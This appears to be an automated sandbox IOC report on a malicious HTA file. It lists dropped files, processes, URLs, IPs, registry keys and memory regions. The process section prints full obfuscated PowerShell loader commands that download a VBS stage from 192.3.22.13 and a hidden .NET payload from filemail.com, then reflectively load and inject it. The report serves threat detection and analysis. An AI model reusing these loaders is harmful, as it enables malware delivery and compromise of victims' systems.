IOC Report
seethebestthingswithgreatsituationshandletotheprogress.hta

loading gif

Files

File Path
Type
Category
Malicious
seethebestthingswithgreatsituationshandletotheprogress.hta
HTML document, ASCII text, with very long lines (65536), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS
Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\seethebestthingsentiretimewithgreatthingswithloverkiss[1].tiff
Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\RES4D39.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Wed Nov 20 09:26:00 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cdsohkt.0hm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3yqxz5ix.u1u.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4h0kjita.4yz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kh2x5wpd.ccy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxcn21ql.1qb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_typn21qo.zuv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujlalfbm.aqm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvbquj4a.30t.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjrnsgic.mqv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xk02v1nn.r3d.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\ndpe2s1t\CSCD8BAC46370384FA881732B4F85FC96.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (370)
dropped
C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.out
Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
modified
There are 11 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\seethebestthingswithgreatsituationshandletotheprogress.hta"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\sYSteM32\WInDowspoWeRShelL\V1.0\POWeRSHElL.EXe" "PoWERsHelL.Exe -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe ; INVoKe-ExPReSSIOn($(InVOkE-exPReSSIon('[sYStEM.Text.ENcODInG]'+[CHAR]58+[CHar]58+'utf8.GETstRIng([sYstEM.CONVeRt]'+[ChAR]58+[chaR]58+'FROMBAsE64sTRING('+[CHaR]34+'JGsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQmVyREVGaW5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkQ2JwY2N4dVFRbSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJek1tLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFppdmRUcFYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZVeUZIc2dOZSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrVU96SGNmbHp5KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGZCIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIU2Jmb1ZwbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyLjEzL3hhbXBwL3NlL3NlZXRoZWJlc3R0aGluZ3NlbnRpcmV0aW1ld2l0aGdyZWF0dGhpbmdzd2l0aGxvdmVya2lzcy50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIiwwLDApO1NUYVJ0LXNsZUVwKDMpO2lFeCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGluZ3N3aXRobG92ZXJraXMudmJTIg=='+[cHaR]0x22+'))')))"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPAsS -noP -W 1 -c DEvIceCrEdenTialdEPLoyment.Exe
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ndpe2s1t\ndpe2s1t.cmdline"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestthingsentiretimewithgreatthingswithloverkis.vbS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdEcDNpbWFnZVVybCA9IEYxbWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MicrJ0FhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmgnKydtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRjFtO0RwM3dlJysnYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7RHAzaW1hZ2VCeXRlcyA9IERwM3dlYkNsaWVudCcrJy5Eb3cnKydubG9hZERhdGEoRHAzaW1hZycrJ2VVcicrJ2wpO0RwM2ltYWdlVGV4JysndCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKERwM2ltYWdlQnl0ZXMpO0RwM3N0YXJ0RmxhZyA9IEYxbTwnKyc8QkFTRTY0X1NUQVJUPj5GMW0nKyc7RHAzZW5kRmxhZyA9IEYxbTw8QkFTRTY0X0VORD4+RjFtO0RwM3N0YXJ0SScrJ25kZXggPSBEcDNpbWFnZVRleHQuSW5kZXhPZihEcDNzdGFydEZsYWcpO0RwM2VuZEluZGUnKyd4ID0gRHAzaW1hZ2VUZXh0LkluZGV4T2YoRHAzZW4nKydkJysnRmxhZyk7RHAzc3RhcnRJbmRleCAtJysnZ2UgMCAtYW5kIERwM2VuZEluZGV4IC1nJysndCBEcDNzdGFydEluZGV4O0RwM3N0YXJ0SW5kZXggKz0gRHAzc3RhcnQnKydGJysnbGFnLkxlbmd0aDtEcDNiYXNlNjRMZW5ndGggPSBEcDNlbmRJbmRleCAtIERwM3N0YXJ0SW5kZXg7RHAzYmFzJysnZTY0Q29tbWFuZCA9IERwM2ltYWdlVGV4dC5TdWJzdHJpbmcoRHAzc3RhcnRJbmRleCwgRHAzYmFzZTY0TGVuZ3RoKTtEcDNiYXNlNjRSZXZlcicrJ3NlZCA9IC1qb2luIChEcDNiYXNlNjRDb21tYW5kLlRvQ2gnKydhckFyJysncmF5KCkgNTl0IEZvckVhY2gtT2JqZWN0IHsgRHAzXyB9KVstMS4uLScrJyhEcDNiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO0RwM2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbicrJ2coJysnRHAzYicrJ2FzZTY0UmV2ZXJzZWQpO0RwM2xvYWQnKydlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZScrJ2N0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChEcDNjb21tYW5kQnl0ZXMpO0RwM3ZhaU1ldGhvZCcrJyA9JysnIFtkJysnbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoRjFtVkFJRjFtKTtEcDN2YWlNZXRob2QuSW52bycrJ2tlKERwM251bGwsIEAoRjFtdHh0LkZSRkZSVy8yNTMvMzEuMjIuMy4yOTEvLzpwdHRoRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGJysnMW1kZXNhdGl2YWRvRjFtLCBGMW1kZXNhdGl2YWRvRjFtLCBGMW1BZGRJblAnKydyb2Nlc3MzJysnMkYxbSwgRjFtZGVzYXRpdmFkb0YxbSwgRjFtZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLEYxbWRlc2F0aXZhZG9GMScrJ20sRjFtJysnZGVzYXRpdmFkb0YxbSxGMW1kZXNhdGl2YWRvRjFtLCcrJ0YxbWRlc2F0aXZhZG9GMW0sRjFtMUYxbSxGMW1kZXNhdGl2YWRvRjFtKSk7JykuUkVwbGFjZSgoW2NoYVJdNzArW2NoYVJdNDkrW2NoYVJdMTA5KSxbc1RSSU5nXVtjaGFSXTM5KS5SRXBsYWNlKChbY2hhUl02OCtbY2hhUl0xMTIrW2NoYVJdNTEpLCckJykuUkVwbGFjZSgoW2NoYVJdNTMrW2NoYVJdNTcrW2NoYVJdMTE2KSxbc1RSSU5nXVtjaGFSXTEyNCl8IC4oKEdldC1WQVJJYWJMRSAnKm1kcionKS5OYW1lWzMsMTEsMl0tSm9pTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Dp3imageUrl = F1mhttps://1017.filemail.com/api/file/get?filekey=2'+'Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f F1m;Dp3we'+'bClient = New-Object System.Net.WebClient;Dp3imageBytes = Dp3webClient'+'.Dow'+'nloadData(Dp3imag'+'eUr'+'l);Dp3imageTex'+'t = [System.Text.Encoding]::UTF8.GetString(Dp3imageBytes);Dp3startFlag = F1m<'+'<BASE64_START>>F1m'+';Dp3endFlag = F1m<<BASE64_END>>F1m;Dp3startI'+'ndex = Dp3imageText.IndexOf(Dp3startFlag);Dp3endInde'+'x = Dp3imageText.IndexOf(Dp3en'+'d'+'Flag);Dp3startIndex -'+'ge 0 -and Dp3endIndex -g'+'t Dp3startIndex;Dp3startIndex += Dp3start'+'F'+'lag.Length;Dp3base64Length = Dp3endIndex - Dp3startIndex;Dp3bas'+'e64Command = Dp3imageText.Substring(Dp3startIndex, Dp3base64Length);Dp3base64Rever'+'sed = -join (Dp3base64Command.ToCh'+'arAr'+'ray() 59t ForEach-Object { Dp3_ })[-1..-'+'(Dp3base64Comma'+'nd.Length)];Dp3commandBytes = [System.Convert]::FromBase64Strin'+'g('+'Dp3b'+'ase64Reversed);Dp3load'+'edAssembly = [System.Refle'+'ction.Assembly]'+'::Load(Dp3commandBytes);Dp3vaiMethod'+' ='+' [d'+'nlib.IO.Home].GetMethod(F1mVAIF1m);Dp3vaiMethod.Invo'+'ke(Dp3null, @(F1mtxt.FRFFRW/253/31.22.3.291//:ptthF1m, F1mdesativadoF1m, F'+'1mdesativadoF1m, F1mdesativadoF1m, F1mAddInP'+'rocess3'+'2F1m, F1mdesativadoF1m, F1mdesativadoF1m,F1mdesativadoF1m,F1mdesativadoF1'+'m,F1m'+'desativadoF1m,F1mdesativadoF1m,'+'F1mdesativadoF1m,F1m1F1m,F1mdesativadoF1m));').REplace(([chaR]70+[chaR]49+[chaR]109),[sTRINg][chaR]39).REplace(([chaR]68+[chaR]112+[chaR]51),'$').REplace(([chaR]53+[chaR]57+[chaR]116),[sTRINg][chaR]124)| .((Get-VARIabLE '*mdr*').Name[3,11,2]-JoiN'')"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D39.tmp" "c:\Users\user\AppData\Local\Temp\ndpe2s1t\CSCD8BAC46370384FA881732B4F85FC96.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 1 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://1017.filemail.com/api/file/get?filekey=2
unknown
malicious
http://192.3.22.13/352/WRFFRF.txt
192.3.22.13
malicious
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF
192.3.22.13
malicious
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
unknown
http://192.3.22.13/xampp/se/seet
unknown
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFdB
unknown
https://account.dyn.com/
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFlaF
unknown
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIFM
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f
142.215.209.78
https://1017.filemail.com
unknown
http://go.micros
unknown
https://github.com/Pester/Pester
unknown
http://crl.m
unknown
https://1017.filemail.com/api/file/get?filekLR
unknown
http://crl.micro
unknown
https://aka.ms/pscore6lB
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://ip-api.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://192.3.22.13/xampp/se/seethebestthingsentiretimewithgreatthingswithloverkiss.tIF.f
unknown
http://ip-api.com/line/?fields=hosting
208.95.112.1
There are 22 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
ip-api.com
208.95.112.1
ip.1017.filemail.com
142.215.209.78
1017.filemail.com
unknown

IPs

IP
Domain
Country
Malicious
192.3.22.13
unknown
United States
malicious
142.215.209.78
ip.1017.filemail.com
Canada
208.95.112.1
ip-api.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
FileDirectory
There are 19 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
9526000
trusted library allocation
page read and write
malicious
402000
remote allocation
page execute and read and write
malicious
6590000
trusted library allocation
page read and write
2EB5000
trusted library allocation
page read and write
5E83000
heap
page read and write
67A7000
heap
page read and write
6CDF000
trusted library allocation
page read and write
8DE0000
trusted library allocation
page read and write
86FB000
heap
page read and write
6785000
heap
page read and write
5FE3000
heap
page read and write
7C90000
trusted library allocation
page read and write
34F4000
heap
page read and write
2C4E000
stack
page read and write
3030000
trusted library allocation
page read and write
30B0000
heap
page read and write
30AE000
stack
page read and write
6CFF000
trusted library allocation
page read and write
8C70000
trusted library allocation
page read and write
EAE000
heap
page read and write
3458000
heap
page read and write
32E0000
heap
page read and write
88E0000
heap
page read and write
6CDF000
trusted library allocation
page read and write
6778000
heap
page read and write
2F52000
trusted library allocation
page read and write
55CB000
heap
page read and write
859000
heap
page read and write
6795000
heap
page read and write
6CDF000
trusted library allocation
page read and write
6E1E000
stack
page read and write
6121000
trusted library allocation
page read and write
4FA8000
heap
page read and write
606E000
heap
page read and write
7C0A000
heap
page read and write
E3D000
stack
page read and write
62B9000
trusted library allocation
page read and write
6122000
trusted library allocation
page read and write
6C40000
trusted library allocation
page read and write
7720000
trusted library allocation
page read and write
2C58000
trusted library allocation
page read and write
34B5000
heap
page read and write
340D000
stack
page read and write
7494000
heap
page read and write
71E2000
direct allocation
page read and write
52DE000
trusted library allocation
page read and write
34B5000
heap
page read and write
30E8000
heap
page read and write
851000
heap
page read and write
88AD000
trusted library allocation
page read and write
34D0000
heap
page read and write
346E000
stack
page read and write
3430000
heap
page read and write
6CFF000
trusted library allocation
page read and write
9B7000
stack
page read and write
6CFF000
trusted library allocation
page read and write
5F4C000
heap
page read and write
86F000
heap
page read and write
863E000
stack
page read and write
49B0000
heap
page read and write
5C7E000
stack
page read and write
36E0000
heap
page read and write
7AD0000
trusted library allocation
page read and write
5DE1000
trusted library allocation
page read and write
34BB000
heap
page read and write
4FA9000
heap
page read and write
6799000
heap
page read and write
5445000
heap
page read and write
5D91000
trusted library allocation
page read and write
67EF000
heap
page read and write
6795000
heap
page read and write
523E000
stack
page read and write
61C4000
trusted library allocation
page read and write
3020000
trusted library allocation
page read and write
8D2000
heap
page read and write
3370000
heap
page read and write
110D000
trusted library allocation
page execute and read and write
32B6000
heap
page read and write
6FAB000
stack
page read and write
30C0000
trusted library allocation
page execute and read and write
867000
heap
page read and write
6CFF000
trusted library allocation
page read and write
6A00000
heap
page read and write
3013000
trusted library allocation
page execute and read and write
34E5000
heap
page read and write
520000
heap
page read and write
86D000
heap
page read and write
72AE000
stack
page read and write
7C30000
trusted library allocation
page execute and read and write
F20000
heap
page read and write
85B000
heap
page read and write
34E8000
heap
page read and write
1025000
heap
page read and write
7F0000
heap
page read and write
5310000
trusted library allocation
page read and write
34DD000
heap
page read and write
6CFF000
trusted library allocation
page read and write
3273000
heap
page read and write
898F000
stack
page read and write
6550000
trusted library allocation
page read and write
1122000
trusted library allocation
page read and write
50F8000
trusted library allocation
page read and write
67BC000
heap
page read and write
34DD000
heap
page read and write
810000
heap
page read and write
8DF000
heap
page read and write
6CFF000
trusted library allocation
page read and write
DFD000
stack
page read and write
565F000
heap
page read and write
86F5000
heap
page read and write
5617000
heap
page read and write
54FE000
stack
page read and write
561B000
heap
page read and write
3000000
heap
page read and write
34FD000
heap
page read and write
DEF000
stack
page read and write
75E0000
trusted library allocation
page read and write
554D000
stack
page read and write
676A000
heap
page read and write
6CFF000
trusted library allocation
page read and write
4F24000
heap
page read and write
780000
heap
page read and write
6121000
trusted library allocation
page read and write
873000
heap
page read and write
5373000
heap
page read and write
5E10000
heap
page read and write
1170000
heap
page read and write
643F000
trusted library allocation
page read and write
4DE1000
trusted library allocation
page read and write
90D000
heap
page read and write
60E5000
heap
page read and write
6291000
trusted library allocation
page read and write
34F8000
heap
page read and write
6645000
heap
page read and write
7E20000
trusted library allocation
page read and write
5320000
trusted library allocation
page read and write
7A70000
trusted library allocation
page read and write
7C7E000
stack
page read and write
31DC000
heap
page read and write
1258000
heap
page read and write
9E0000
heap
page read and write
3189000
trusted library allocation
page read and write
56DE000
heap
page read and write
75CD000
stack
page read and write
52DB000
trusted library allocation
page read and write
5EBD000
stack
page read and write
34C1000
heap
page read and write
923000
heap
page read and write
678C000
heap
page read and write
48D0000
trusted library allocation
page read and write
761D000
stack
page read and write
3378000
trusted library allocation
page read and write
7AB0000
trusted library allocation
page read and write
6CDF000
trusted library allocation
page read and write
4E19000
trusted library allocation
page read and write
642E000
stack
page read and write
5418000
heap
page read and write
611A000
trusted library allocation
page read and write
5DA1000
trusted library allocation
page read and write
88B0000
trusted library allocation
page read and write
67BC000
heap
page read and write
67A7000
heap
page read and write
6125000
trusted library allocation
page read and write
34BD000
heap
page read and write
31C0000
trusted library allocation
page read and write
7485000
heap
page execute and read and write
501C000
trusted library allocation
page read and write
7600000
trusted library allocation
page read and write
6CFF000
trusted library allocation
page read and write
7780000
trusted library allocation
page read and write
7BA6000
heap
page read and write
55C4000
heap
page read and write
2F7C000
trusted library allocation
page read and write
611C000
trusted library allocation
page read and write
A621000
trusted library allocation
page read and write
301D000
trusted library allocation
page execute and read and write
36D0000
heap
page read and write
76D8000
heap
page read and write
7E10000
trusted library allocation
page read and write
6785000
heap
page read and write
8DB000
heap
page read and write
492C000
stack
page read and write
34F3000
heap
page read and write
6F65000
heap
page execute and read and write
6E6F000
stack
page read and write
71E6000
direct allocation
page read and write
7AC0000
trusted library allocation
page read and write
2F68000
trusted library allocation
page read and write
726E000
stack
page read and write
7434000
heap
page read and write
818000
heap
page read and write
6340000
trusted library allocation
page execute
7B93000
heap
page read and write
7A40000
trusted library allocation
page execute and read and write
5B3E000
stack
page read and write
6795000
heap
page read and write
37A0000
heap
page read and write
30A0000
trusted library allocation
page read and write
514B000
trusted library allocation
page read and write
565F000
heap
page read and write
352A000
trusted library allocation
page execute and read and write
87C000
heap
page read and write
7770000
trusted library allocation
page read and write
6CFF000
trusted library allocation
page read and write
4D1F000
stack
page read and write
741E000
stack
page read and write
5468000
heap
page read and write
7220000
heap
page read and write
6A13000
heap
page read and write
7461000
heap
page read and write
748D000
heap
page read and write
611C000
trusted library allocation
page read and write
6799000
heap
page read and write
84BD000
stack
page read and write
6125000
trusted library allocation
page read and write
859E000
stack
page read and write
322E000
heap
page read and write
5F4E000
heap
page read and write
65A8000
trusted library allocation
page read and write
65A0000
trusted library allocation
page read and write
5E83000
heap
page read and write
C621000
trusted library allocation
page read and write
869E000
direct allocation
page read and write
56C7000
heap
page read and write
66FF000
heap
page read and write
4EA2000
trusted library allocation
page read and write
8AEC000
heap
page read and write
112A000
trusted library allocation
page execute and read and write
8DB000
heap
page read and write
347E000
heap
page read and write
76BE000
stack
page read and write
4E28000
trusted library allocation
page read and write
332E000
stack
page read and write
8A8000
heap
page read and write
885000
heap
page read and write
BDC000
stack
page read and write
6CDF000
trusted library allocation
page read and write
31A5000
trusted library allocation
page execute and read and write
9D0000
heap
page read and write
6CDF000
trusted library allocation
page read and write
6121000
trusted library allocation
page read and write
4ECB000
heap
page read and write
3530000
trusted library allocation
page read and write
607C000
heap
page read and write
8D2000
heap
page read and write
8DB000
heap
page read and write
5261000
trusted library allocation
page read and write
6A32000
heap
page read and write
5618000
heap
page read and write
6775000
heap
page read and write
7724000
trusted library allocation
page read and write
515E000
trusted library allocation
page read and write
364D000
heap
page read and write
52F6000
trusted library allocation
page read and write
6CDF000
trusted library allocation
page read and write
6125000
trusted library allocation
page read and write
33EE000
unkown
page read and write
55D9000
heap
page read and write
5DA9000
trusted library allocation
page read and write
6A20000
heap
page read and write
1020000
heap
page read and write
56ED000
heap
page read and write
4A50000
heap
page read and write
5A3E000
trusted library allocation
page read and write
6111000
trusted library allocation
page read and write
7B20000
heap
page read and write
6CFF000
trusted library allocation
page read and write
538E000
stack
page read and write
33CC000
stack
page read and write
3EA9000
trusted library allocation
page read and write
6CBC000
trusted library allocation
page read and write
6125000
trusted library allocation
page read and write
32A2000
heap
page read and write
4E01000
trusted library allocation
page read and write
5255000
trusted library allocation
page read and write
9FD1000
trusted library allocation
page read and write
600A000
heap
page read and write
6CBC000
trusted library allocation
page read and write
3790000
trusted library allocation
page read and write
6742000
heap
page read and write
6CFF000
trusted library allocation
page read and write
484F000
heap
page read and write
34AE000
stack
page read and write
724C000
stack
page read and write
59BE000
stack
page read and write
73F0000
heap
page read and write
3E89000
trusted library allocation
page read and write
5489000
heap
page read and write
56C0000
heap
page read and write
3480000
heap
page read and write
34E0000
heap
page read and write
6772000
heap
page read and write
6CFF000
trusted library allocation
page read and write
7E70000
trusted library allocation
page read and write
3210000
heap
page read and write
1239000
heap
page read and write
66F7000
heap
